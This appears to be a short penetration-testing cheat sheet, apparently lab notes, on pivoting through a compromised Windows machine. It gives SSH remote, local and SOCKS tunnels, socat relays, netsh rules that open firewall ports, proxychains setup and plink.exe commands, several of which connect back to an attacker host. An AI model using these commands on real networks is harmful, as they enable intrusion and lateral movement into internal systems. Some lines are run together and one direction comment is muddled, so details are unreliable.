Networking
Port Forwarding for exploits
Attacker Machine -> Pivot Machine -> Victim Machine
SSH Remote Port Forwarding
On Pivot Machine, this forwards traffic from port 1234 on the attacker Machine to port 3389 on the Victim Machine
C:\\> ssh tunneluser@ATTCKER -R 3389:VICTIM:1234 -NSSH Local Port Forwarding
On Pivot Machine, add the following firewall rules
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80On Pivot Machine, this forwards traffic from port 8001 on the attacker Machine to port 80 on the Pivot Machine
C:\\> ssh tunneluser@ATTACKER -L *:80:127.0.0.1:8001 -NSocat portforwarding
On the Pivot Machine, add the following firewall rules
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389On the Pivot Machine, to forward the Attacker Machine to the Victim Machine
C:\\>socat TCP4-LISTEN:3389,fork TCP4:SERVER:3389On Pivot Machine, to forward the Victim Machine to the Attacker Machine
C:\\>socat TCP4-LISTEN:80,fork TCP4:ATTACKER:80SOCKS
On the Pivot Machine
C:\\> ssh tunneluser@ATTACKER -R 9050 -NOn the Attacker machine, setup proxychains under /etc/proxychains.conf
[ProxyList]
socks4 127.0.0.1 9050On the Attacker Machine, prefix commands with proxychains to send traffic to port 9050, which is then forwarded to the Pivot Machine
$ proxychains curl <http://pxeboot.za.tryhackme.com>plink.exe
Assuming you already have a shell on the victim machine, we can use
plink.exeon the victim machine to forward traffic from the attacker machine to other internal networks in the victim network
> .\\plink.exe root@<attacker IP> -R <attacker port>:127.0.0.1:<victim port>This creates a SSH connection to our attacker machine as root, and forwards any traffic from the attacker port to the victim port on 127.0.0.1
Last updated